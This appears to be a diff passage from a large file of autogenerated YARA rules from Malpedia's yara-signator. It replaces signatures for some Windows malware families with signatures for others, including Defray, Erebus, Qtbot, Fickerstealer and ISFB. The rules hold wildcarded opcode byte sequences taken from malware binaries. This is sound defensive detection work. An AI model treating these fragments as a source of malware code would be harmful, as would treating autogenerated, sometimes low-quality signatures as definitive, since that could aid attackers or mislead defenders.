+		$sequence_6 = { 6a00 6a02 8b4ddc 51 8b55d8 52 e8???????? }
+		$sequence_7 = { 894dec 8b55ec 3b55e8 732e 8b45f0 50 8b4dec }
+		$sequence_8 = { 8b0d???????? 51 68???????? e8???????? 83c410 c78500feffff00000000 8b9504feffff }
+		$sequence_9 = { 8b4dfc 8b9058080000 2b915c080000 8b450c 395018 }
 
 	condition:
-		7 of them and filesize < 181248
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Astralocker_Auto : FILE
+rule MALPEDIA_Win_Defray_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "44156298-552d-5dee-871e-065e8177c7e9"
+		id = "23c37ae2-467d-5f29-b754-9bdc94cdef46"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.astralocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.astralocker_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.defray"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.defray_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "a5647fc347475c8a37d856421ffd217ff32a1a45599157161a2296f0a4c958b5"
+		logic_hash = "d9d1b63e76728813771527a0e75abb334c604ad0cc64db1ac03a90b90d9454be"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89852,34 +90044,34 @@ rule MALPEDIA_Win_Astralocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 891401 89740104 b808000000 6bc800 8b5508 }
-		$sequence_1 = { 51 e8???????? 83c408 8945ec 8955f0 }
-		$sequence_2 = { 50 8b0c0a 51 e8???????? 83c408 }
-		$sequence_3 = { 57 b808000000 6bc80a 8b5508 33c0 33f6 89040a }
-		$sequence_4 = { ba08000000 6bc20a 8b4d08 33d2 }
-		$sequence_5 = { 51 8b14d0 52 e8???????? 83c408 8945f4 8955f8 }
-		$sequence_6 = { 6bc20a 8b4d08 33d2 33f6 891401 }
-		$sequence_7 = { 8b4cd004 51 8b14d0 52 e8???????? 83c408 8945f4 }
-		$sequence_8 = { b808000000 6bc80a 8b5508 33c0 33f6 89040a }
-		$sequence_9 = { b808000000 6bc80a 8b5508 33c0 33f6 }
+		$sequence_0 = { 894704 8b45fc 8d0483 894708 }
+		$sequence_1 = { ab ab 66ab 33c0 8dbdb4faffff a5 a5 }
+		$sequence_2 = { f78580cfffff00040000 0f85c0030000 8d85c0fdffff 50 ff15???????? 83f8ff }
+		$sequence_3 = { 33c0 897dee 668945ec 66897df2 6a03 6a20 6a03 }
+		$sequence_4 = { 8d95a4f5ffff 8d8da4fdffff e8???????? 85c0 0f8e32010000 68ca050000 8d95a4f5ffff }
+		$sequence_5 = { 8bf0 33ff b9???????? 8d85accfffff 668b10 663b11 7523 }
+		$sequence_6 = { a1???????? 33c5 50 8d45f4 64a300000000 eb24 8b048d00eb4800 }
+		$sequence_7 = { 99 f7ff 8b7d08 8bd0 3bfa 766c b950077500 }
+		$sequence_8 = { a1???????? 8d9598f9ffff 8907 8bf2 668b02 83c202 663bc1 }
+		$sequence_9 = { ba05000000 8d0da0564700 e9???????? a90000f07f 752c a9ffff0f00 7525 }
 
 	condition:
-		7 of them and filesize < 191488
+		7 of them and filesize < 1253376
 }
-rule MALPEDIA_Win_Microcin_Auto : FILE
+rule MALPEDIA_Win_Erebus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e3018704-b085-5615-9047-7419a64c6b42"
+		id = "bb1eb465-4db1-53de-8a86-97595b0c4304"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.microcin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.microcin_auto.yar#L1-L451"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.erebus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.erebus_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ce937d5b0febb8a0ef0b69b389b9ac6e2a402988a44ce06e021321112f9c236c"
+		logic_hash = "f2c3fac68e77b34a8cb144aa7557b3180cfb2d2c5f88070b47f30c977edf0360"
 		score = 75
-		quality = 44
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89891,74 +90083,34 @@ rule MALPEDIA_Win_Microcin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48895c2410 55 488dac2440feffff 4881ecc0020000 488b05???????? 4833c4 }
-		$sequence_1 = { 8d45ac 50 6801000080 ff15???????? }
-		$sequence_2 = { ff15???????? 4863c8 c6840d8002000075 488d8d80020000 }
-		$sequence_3 = { 7515 c74424484c773373 c744244c31674d5a e9???????? c744244849734541 }
-		$sequence_4 = { 4533c9 33d2 498d4e70 ff15???????? 85c0 }
-		$sequence_5 = { 85c0 0f8599000000 33d2 41b810020000 }
-		$sequence_6 = { b9ff030000 2bc8 4863d1 4883ea02 }
-		$sequence_7 = { 897e04 5b 5f 5e 5d c20400 55 }
-		$sequence_8 = { 7e18 80bc35a8feffff3a 741f 8d85a8feffff 46 }
-		$sequence_9 = { c6840d7002000062 488d8d70020000 ff15???????? 4863c8 }
-		$sequence_10 = { 8d85f8feffff 6804010000 50 ff15???????? 8d85f8feffff }
-		$sequence_11 = { 6a10 50 56 ff15???????? 85c0 0f45f7 }
-		$sequence_12 = { 894620 c7462406000000 33c0 48894638 48894630 }
-		$sequence_13 = { 68ffff0000 56 8b35???????? ffd6 6a04 }
-		$sequence_14 = { ff75d4 e8???????? 83c40c 8bc7 }
-		$sequence_15 = { 50 ffd3 85c0 7e18 80bc35a8feffff3a }
-		$sequence_16 = { 752a 4c8d0502130100 8bd7 498bcd e8???????? 85c0 7415 }
-		$sequence_17 = { 4c8d0535120100 33c0 498bd0 3b0a 740e ffc0 }
-		$sequence_18 = { 41bc14030000 4c8d0574130100 488bcd 418bd4 e8???????? }
-		$sequence_19 = { 83bc9578feffff00 7d34 8b857cffffff 8b8c8578feffff 83c104 8b957cffffff 898c9578feffff }
-		$sequence_20 = { 4053 4883ec20 8bd9 488d0d950c0100 }
-		$sequence_21 = { b905000000 f7f1 85d2 750b ff15???????? }
-		$sequence_22 = { fa fa fa fa fa fa }
-		$sequence_23 = { 53 53 56 43 }
-		$sequence_24 = { 83f831 7d5c 8b4df4 034df8 }
-		$sequence_25 = { 89857cffffff 83bd7cffffff20 0f8daf000000 8b8d7cffffff 8b957cffffff 8b448d80 2b8495f8feffff }
-		$sequence_26 = { 636373 7673 6873742e65 7865 }
-		$sequence_27 = { 751a 488d15f8110100 41b810200100 488bcd e8???????? }
-		$sequence_28 = { 7370 696465726167656e 742e 657865 }
-		$sequence_29 = { 8b8d78dfffff 83c103 8b9578dfffff 890c95003c4100 }
-		$sequence_30 = { 33c0 39b8283a4100 0f8491000000 ff45e4 83c030 }
-		$sequence_31 = { 0fb645fb 99 b903000000 f7f9 85d2 751d }
-		$sequence_32 = { 4889742420 e8???????? cc 4c8d056c120100 498bd4 488bcd }
-		$sequence_33 = { 6828010000 8d85ccfeffff 6a00 50 }
-		$sequence_34 = { 498bcd e8???????? 4c8d05b7120100 41b903000000 488d4c45bc 488bc1 }
-		$sequence_35 = { 6e 7669 726f 6e 6d 656e 7400 }
-		$sequence_36 = { 4885c0 7419 488d15730c0100 488bc8 }
-		$sequence_37 = { 33c0 eb42 8b4df0 e8???????? 8d45f8 50 6a00 }
-		$sequence_38 = { 0fb785d4f4ffff 50 8d85e8f4ffff 68???????? 50 }
-		$sequence_39 = { 50 ff15???????? 8d85c8feffff 6a00 6880000000 6a04 }
-		$sequence_40 = { ffd3 f7d8 1bc0 f7d8 5f 5e 5b }
-		$sequence_41 = { e8???????? 8d442464 83c40c 89442434 8d44240c }
-		$sequence_42 = { 8b9504010000 48 63d2 48 03c2 8b9504010000 48 }
-		$sequence_43 = { 89d5 ba67676767 45 89cf 45 89c6 49 }
-		$sequence_44 = { 6a00 57 ff15???????? 8b1d???????? c705????????01000000 6a00 6a00 }
-		$sequence_45 = { 8b55e4 83c40c 6bd230 8d82c0d34000 }
-		$sequence_46 = { 75e4 56 ffd3 33c0 }
-		$sequence_47 = { 85c0 0f84ed000000 8b3d???????? 50 6a08 ffd7 8b1d???????? }
-		$sequence_48 = { e9???????? 48 8d6570 5d c3 5b 48 }
-		$sequence_49 = { 8b5664 8d4c1105 8908 68ebeeebee ff7658 e8???????? }
+		$sequence_0 = { 75e4 33c0 8b54242c 33c9 85c0 8bfb 0f4ff9 }
+		$sequence_1 = { 55 56 57 8b7308 8b430c 895c241c 85f6 }
+		$sequence_2 = { 33c0 c744243007000000 8d146b c744242c00000000 668944241c 663902 }
+		$sequence_3 = { 8b0f 8b4704 2bc1 55 83e0fc 50 51 }
+		$sequence_4 = { 03ff 8b0485b86f5200 894c1830 8b45f0 8b5de8 3b450c }
+		$sequence_5 = { 8da42400000000 833d????????00 750f e8???????? c705????????c0474400 b902000000 c7442430043a5000 }
+		$sequence_6 = { 68???????? 8d4dd8 e8???????? 50 6a00 8d45a8 }
+		$sequence_7 = { c744245c00000000 e8???????? 8b54242c 33c0 8b5c2430 8bca 8bfb }
+		$sequence_8 = { 0bd7 890cc5d07a5200 8914c5d47a5200 40 3d00010000 7cb2 0f57c0 }
+		$sequence_9 = { 7405 2bea 896b10 8b4c2440 64890d00000000 59 }
 
 	condition:
-		7 of them and filesize < 417792
+		7 of them and filesize < 2564096
 }
-rule MALPEDIA_Win_Cova_Auto : FILE
+rule MALPEDIA_Win_Qtbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fa07deb6-c177-5206-9d19-f63251440ec2"
+		id = "b6cd7830-06d4-528e-badc-1164fe765257"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cova"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cova_auto.yar#L1-L110"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qtbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qtbot_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "d5e67f28620dc0f740b402e9f8384fb0d05494020e9e1fdf2531ffdb1df92592"
-		score = 75
-		quality = 75
+		logic_hash = "b0461cc5472670ef13bed91b802682965df84a278581734494bb0db4dd3456a2"
+		score = 60
+		quality = 25
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89970,32 +90122,38 @@ rule MALPEDIA_Win_Cova_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d7b58 be06000000 488d0525670000 483947f0 }
-		$sequence_1 = { 488d0509820000 483bf8 740e 833f00 }
-		$sequence_2 = { 7526 4c8d25bb610000 493bdc 7408 488bcb e8???????? }
-		$sequence_3 = { 4288840120a90000 ffc2 ebe1 897c2420 }
-		$sequence_4 = { ff5778 488bd8 4885c0 741f ba20bf0200 488bc8 }
-		$sequence_5 = { 488d15a4300000 41b810200100 488bcd e8???????? }
-		$sequence_6 = { 7528 48833d????????00 741e 488d0d09b30000 }
-		$sequence_7 = { 488d15564a0000 488d0d374a0000 e8???????? 85c0 755a }
-		$sequence_8 = { 410fb601 48c1e804 8a440438 8841ff 490fbe01 }
-		$sequence_9 = { 8b0a 4803cf 33c0 eb0c }
+		$sequence_0 = { 50 e8???????? 3b4508 740b }
+		$sequence_1 = { 33c0 53 8a1a 6bc80d }
+		$sequence_2 = { 85c0 742a 8b049a 03c6 }
+		$sequence_3 = { 8b400c 8b7014 ad 8b00 }
+		$sequence_4 = { 8b049a 03c6 50 e8???????? }
+		$sequence_5 = { 33f6 8bde 85ff 7455 8b4510 89450c 8d4301 }
+		$sequence_6 = { 89450c 8d4301 0fb6d8 8a941dfcfeffff 0fb6c2 }
+		$sequence_7 = { 84db 75e9 5b 5d c20400 }
+		$sequence_8 = { 53 ff15???????? 837c241000 7423 8b442418 8b4c2410 }
+		$sequence_9 = { 837e04ff 8bd8 8d7e08 7504 8b2f eb02 8bef }
+		$sequence_10 = { 833e05 7521 6a10 6a40 ff15???????? }
+		$sequence_11 = { 8b0c855c300010 c1e705 33d2 03fe 42 837dfcff 8955dc }
+		$sequence_12 = { 837efcff 7518 8b46f8 8b04855c300010 }
+		$sequence_13 = { 8b4ef8 83f907 0f8781000000 ff248dfb240010 881f eb76 ff30 }
+		$sequence_14 = { 8b55fc 8d0c8a 894dfc eb0e 8b14957c300010 }
+		$sequence_15 = { 0fb6805a210010 ff2485f6200010 8b8614080000 3b45f4 7e03 }
 
 	condition:
-		7 of them and filesize < 123904
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Himan_Auto : FILE
+rule MALPEDIA_Win_Slave_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "43abb682-bd1a-5c0e-aa2b-b956d3c70fcc"
+		id = "b045c957-b6f9-5c69-b89f-41a2fc8766bd"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.himan_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.slave"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.slave_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "30040eb81b0c6b577d494b8638c7a8a804b8dda803c9d87443634bca63af8301"
+		logic_hash = "32dc8f0602dd0c995ffd6f35edd82eaee41a96ee44816d90c15c92afe3d59d57"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90009,32 +90167,32 @@ rule MALPEDIA_Win_Himan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 330c9d94886e00 8b58f0 33cb 8bdf c1eb10 81e3ff000000 895c2438 }
-		$sequence_1 = { 8bd6 c1ea10 81e2ff000000 c1ed18 8b1495bcc26e00 3314adbcc66e00 8b2c9dbcbe6e00 }
-		$sequence_2 = { 81e1ff000000 c1eb08 8b0c8d94906e00 81e3ff000000 330c9d948c6e00 8bde c1eb18 }
-		$sequence_3 = { 8b75f4 8bd1 8d7dfc c1e902 }
-		$sequence_4 = { 8d8dbcfbffff 51 ffd3 8bf0 46 8d0436 83c003 }
-		$sequence_5 = { 55 56 57 b910000000 33c0 8d7c246c }
-		$sequence_6 = { c1ea02 83e23f a4 7c0b 83fa40 7d06 8a541428 }
-		$sequence_7 = { 8b542444 8d0c00 8b442410 51 53 6a01 }
-		$sequence_8 = { 50 ff15???????? 8d4c246c 68???????? }
-		$sequence_9 = { c21800 8b4514 50 ff15???????? 33c0 8da5b0f3ffff }
+		$sequence_0 = { c0eb06 0ad8 8899e7020000 8a17 d0ea 32d3 80e21c }
+		$sequence_1 = { 50 ffd3 008608010000 83c40c 83be1403000000 8a8e08010000 7c3a }
+		$sequence_2 = { 33c7 03c1 81c28647beef 03d0 8b45d4 }
+		$sequence_3 = { 837df400 0f846c2d0000 8a8608030000 240f 0fb6c0 66894706 }
+		$sequence_4 = { 8b45ec 8b00 894720 8b45ec 8b4004 894724 e9???????? }
+		$sequence_5 = { f6c110 7509 80c910 888e94030000 8a475d 24bf 0c20 }
+		$sequence_6 = { 33c8 8bc3 8b5dd8 c1c806 33c8 8bc7 }
+		$sequence_7 = { 50 8d4208 50 ff15???????? 8b45fc 2bfe f30f7e05???????? }
+		$sequence_8 = { 3a4202 750d 83feff 741c 8a4103 3a4203 7414 }
+		$sequence_9 = { 810e80000100 f70600400000 8b550c 743c 0fb68707030000 808f0603000002 c1e804 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 532480
 }
-rule MALPEDIA_Win_Pgift_Auto : FILE
+rule MALPEDIA_Win_Fickerstealer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5134e180-c701-504d-b27b-1f2a37782304"
+		id = "9f6a3748-f0ba-5d54-bc6b-9a386da9e8f6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pgift_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fickerstealer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fickerstealer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "86543d2a9c2965bb35bf9078bd182bce16bae717918e12d47f187ce1755d9b8f"
+		logic_hash = "0126c62412dad879a43e44f06017fe0625a540d4c54a2a3f5410236702fb1a45"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90048,32 +90206,32 @@ rule MALPEDIA_Win_Pgift_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645fc03 e8???????? ff7510 8d4de8 }
-		$sequence_1 = { e8???????? 8d7e01 57 ebac }
-		$sequence_2 = { 53 6a11 ff15???????? 8bd8 8d45ec }
-		$sequence_3 = { 53 6a01 6800000040 ff75ec ff15???????? 8bd8 }
-		$sequence_4 = { 7408 ff4510 83c710 eb99 8b4e14 }
-		$sequence_5 = { 89450c 8d45e4 53 50 8d4594 50 }
-		$sequence_6 = { 50 8d4de4 e8???????? 33db 8d8de4feffff 895dfc 895dec }
-		$sequence_7 = { 8d4de8 c645fc01 e8???????? 83f8ff 750f 6a2f 8d4de8 }
-		$sequence_8 = { e9???????? 8b4d08 8bc3 2bc1 c1f802 3bc7 7369 }
-		$sequence_9 = { e8???????? ff75e8 ff15???????? eb53 8b45ec 3958f8 742f }
+		$sequence_0 = { ff500c 83c40c 84c0 0f85fe000000 8b45f0 8945cc 8975d0 }
+		$sequence_1 = { ebb7 e8???????? 89c1 8945ec 6a02 58 31d2 }
+		$sequence_2 = { f20f104c2420 31d2 895c2470 890c24 894c2474 898424f0000000 8b442428 }
+		$sequence_3 = { 8b4508 c7400cffffff7f 834808ff 834804ff 8308ff 5d c3 }
+		$sequence_4 = { 31cb 234c2404 21df 231c24 31f8 89fa 8b7c2408 }
+		$sequence_5 = { f20f114e0c 895614 eb12 8365e400 8d4de4 e8???????? 8b45f0 }
+		$sequence_6 = { d3e8 31db 80c518 43 21d8 c1e008 09d0 }
+		$sequence_7 = { 56 83ec10 8b7d0c 8b4514 8b4d10 8b7508 8b5d18 }
+		$sequence_8 = { f20f114610 f20f114e08 f20f1116 56 e8???????? 59 83c418 }
+		$sequence_9 = { c1e00f 09f8 c1e107 0fb6f9 8b4de8 09f8 89df }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Noxplayer_Auto : FILE
+rule MALPEDIA_Win_Wonknu_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fab5d56f-e9c6-515a-ae0f-470960c542fb"
+		id = "7c22ecc6-5e07-568e-a954-bd5d4c46a783"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.noxplayer_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wonknu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wonknu_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "77744292ebf109ed57f41d00cb6e30b7a306c1c6c824a437b236cefc116466ee"
+		logic_hash = "d8729848e6f29de29baa83d3d1b7a400fd076f81fa4553c7cf2ef20e4ee0bd77"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -90087,34 +90245,34 @@ rule MALPEDIA_Win_Noxplayer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b11 89449afc 483bdd 7cdd 488d5e28 41bc04000000 }
-		$sequence_1 = { 8b0cb8 41890b e8???????? 488b4e10 4c8bd8 442b1cf9 3b7e1c }
-		$sequence_2 = { 48634810 488b00 486bc968 488d540198 48395318 7417 488b4318 }
-		$sequence_3 = { 4889b180000000 4889b1d0000000 4889b188000000 4889b1d8000000 4889b1e0000000 4889b190000000 4889b1e8000000 }
-		$sequence_4 = { 488bd8 482b1f 483b4710 750d ba01000000 488bcf e8???????? }
-		$sequence_5 = { 8b4328 41894618 33c0 e9???????? 488b4740 488b4810 8b4760 }
-		$sequence_6 = { 488bc6 48894360 c6436800 488d442430 4889442428 89742420 4c8bcb }
-		$sequence_7 = { 488b1b 488bcf e8???????? 488bfb 807b2100 74e0 33d2 }
-		$sequence_8 = { 80792900 7513 483b4110 750d 488bc1 488b4908 }
-		$sequence_9 = { 413bc9 7e04 ffc7 03c1 4883c204 49ffc8 75e7 }
+		$sequence_0 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? 803b00 }
+		$sequence_1 = { eb08 c6840550ffffff00 8d8550ffffff 50 e8???????? }
+		$sequence_2 = { 8bfc b901050000 f3a5 8bcb e8???????? 803b00 }
+		$sequence_3 = { 8d7e28 57 ff15???????? 8b4608 }
+		$sequence_4 = { e8???????? 8bfc b901050000 f3a5 8bcb }
+		$sequence_5 = { f3a5 8bcb e8???????? 803b00 }
+		$sequence_6 = { 8bfc b901050000 f3a5 8bcb }
+		$sequence_7 = { c6840550ffffff00 8d8550ffffff 50 e8???????? }
+		$sequence_8 = { 53 56 57 6804140000 }
+		$sequence_9 = { e8???????? 8bfc b901050000 f3a5 8bcb e8???????? }
 
 	condition:
-		7 of them and filesize < 742400
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Jlorat_Auto : FILE
+rule MALPEDIA_Win_Isfb_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1d1cf35b-b348-5281-a39e-6f479f3341d0"
+		id = "ad10a285-c85e-5394-87a5-a8221885f0c5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jlorat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.isfb_auto.yar#L1-L1627"
 		license_url = "N/A"
-		logic_hash = "f1e1cc634deaa339c16c9b45b57e58aeaba6eb3b461fa4ec4f4f48da46c3a4c6"
+		logic_hash = "98d556ee27067e40eff884830538b87541d671166c2ebdd8799d4e04e5a64591"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -90126,32 +90284,213 @@ rule MALPEDIA_Win_Jlorat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7004 e8???????? 83c40c 8b45e8 64a300000000 83c414 5e }
-		$sequence_1 = { f20f118620010000 c786c801000004000000 89e0 8d8e20010000 894804 8d8e08010000 8908 }
-		$sequence_2 = { f20f1145c4 894dd0 8945d4 c745f000000000 89e0 c7400404000000 c70014000000 }
-		$sequence_3 = { e9???????? 8b3424 897c242c 8bbc2418020000 83ff29 0f8339090000 85ff }
-		$sequence_4 = { f20f118eb00e0000 f20f1186a80e0000 8b86b80e0000 8986d00e0000 f20f1086a80e0000 f20f108eb00e0000 f20f118ec80e0000 }
-		$sequence_5 = { eb00 8b8d6cffffff 8b8558ffffff 8945d0 89e0 8908 e8???????? }
-		$sequence_6 = { c745f000000000 89e0 8d4da8 8908 e8???????? eb00 8b855cffffff }
-		$sequence_7 = { 8b4d0c 51 8b5508 52 e8???????? 83c40c 0fb64510 }
-		$sequence_8 = { f6861701000001 7552 8b8e10010000 89e0 894804 8d8e48010000 898efc000000 }
-		$sequence_9 = { eb00 8b4de0 83c140 c745f002000000 89e0 8908 e8???????? }
+		$sequence_0 = { 50 33c0 e8???????? 3bc7 740f }
+		$sequence_1 = { 33c0 3bc7 741b 50 33c0 }
+		$sequence_2 = { 33c0 3bc7 7413 50 }
+		$sequence_3 = { ff75f4 6822010000 e9???????? ff7508 }
+		$sequence_4 = { 6a10 58 e8???????? 3bc7 7406 50 e8???????? }
+		$sequence_5 = { 51 57 50 e8???????? 83c40c e8???????? 3bc7 }
+		$sequence_6 = { 6a64 ff15???????? a1???????? 85c0 7407 83ee64 }
+		$sequence_7 = { ff35???????? e8???????? 8bf0 3bf3 7443 6aff }
+		$sequence_8 = { 50 e8???????? 3bdf 7414 }
+		$sequence_9 = { ff35???????? ff15???????? 85c0 a3???????? 7402 ffe0 }
+		$sequence_10 = { 5b 59 c20400 8325????????00 }
+		$sequence_11 = { ff15???????? 3c05 7506 84e4 7704 3ac0 }
+		$sequence_12 = { 5b c20400 55 8bec 83ec0c a1???????? 8365f800 }
+		$sequence_13 = { 83451004 83c004 49 8917 75e9 8b4e10 83e103 }
+		$sequence_14 = { b8???????? 53 bb60ea0000 53 }
+		$sequence_15 = { 75e9 8b4e10 83e103 740d 51 50 ff7510 }
+		$sequence_16 = { 3bc3 7512 e8???????? 3bc3 a3???????? }
+		$sequence_17 = { 8b10 2b55fc 8b7d10 0155fc 83451004 83c004 49 }
+		$sequence_18 = { 51 50 ff7510 e8???????? 83c40c c745fc01000000 8b4610 }
+		$sequence_19 = { ff37 ff15???????? 2b442414 50 }
+		$sequence_20 = { 8b4320 897324 897328 83c40c 8974240c c6401a00 8b44240c }
+		$sequence_21 = { 57 8b3b 897c241c 760a 8b4b20 e8???????? eb02 }
+		$sequence_22 = { 83631c00 894b34 8b4b24 2b4b28 894c2410 8b4b34 }
+		$sequence_23 = { 8a4604 2404 f6d8 1bc0 }
+		$sequence_24 = { 7520 ff37 50 ff35???????? ff15???????? 8b442414 }
+		$sequence_25 = { 6a0d 58 e8???????? 85c0 740d 8906 }
+		$sequence_26 = { ff15???????? 8b442414 8b4c240c 8907 8b442418 894110 836334f9 }
+		$sequence_27 = { 8b07 03442418 50 56 ff5310 8b16 }
+		$sequence_28 = { ff35???????? 0fc8 50 a1???????? }
+		$sequence_29 = { 68???????? e8???????? 8b07 c6400731 8b74241c 8b1e 6a00 }
+		$sequence_30 = { 837d1800 b8???????? 7505 b8???????? 53 }
+		$sequence_31 = { 53 8bc6 e8???????? 85c0 7516 }
+		$sequence_32 = { 752f 8b450c 8930 eb33 6a00 }
+		$sequence_33 = { 8b4c240c 8911 eb07 6a0b eb02 }
+		$sequence_34 = { 488bcf c744242860ea0000 4c0f45c8 48895c2420 e8???????? }
+		$sequence_35 = { 3bc8 7415 8b5210 3bd0 740e }
+		$sequence_36 = { 3bd0 7420 8b4a0c 3bc8 7415 }
+		$sequence_37 = { 50 8d4508 50 53 8bc6 }
+		$sequence_38 = { 74a3 33ff eb0b 33ff }
+		$sequence_39 = { 750e 837d0800 7408 ff7508 e8???????? 8bc7 }
+		$sequence_40 = { c21000 55 8bec 83ec14 a1???????? 53 56 }
+		$sequence_41 = { 57 6a01 ff75e0 68???????? }
+		$sequence_42 = { 4885ff 4c8be7 75c4 48892e eb02 33db 488b0d???????? }
+		$sequence_43 = { 498bcc eb07 83c301 488d4801 66ba2000 ff15???????? 4885c0 }
+		$sequence_44 = { e8???????? be01000000 8bc6 4883c440 }
+		$sequence_45 = { 488bcf ff15???????? 4c8964dd00 83c301 }
+		$sequence_46 = { 33d2 41c1e003 ff15???????? 4885c0 488be8 7453 }
+		$sequence_47 = { 415c 5f 5e 5d 5b c3 8b4754 }
+		$sequence_48 = { e8???????? 85c0 742d ff75fc 6a0d }
+		$sequence_49 = { 33db 66ba2000 498bcc ff15???????? 4885c0 }
+		$sequence_50 = { 53 b800080000 50 56 ff35???????? }
+		$sequence_51 = { 740f 488b0d???????? 33d2 ff15???????? bb01000000 498bcc eb07 }
+		$sequence_52 = { 498bcc ff15???????? 33db 66ba2000 }
+		$sequence_53 = { a3???????? 7402 ffe0 c20400 55 8bec 83ec10 }
+		$sequence_54 = { 53 ff35???????? c745f408000000 ff15???????? 3bc3 8945f8 }
+		$sequence_55 = { 8bd5 488bcf bb57000000 e8???????? }
+		$sequence_56 = { e8???????? 3bc3 740f 8b35???????? 50 83c604 e8???????? }
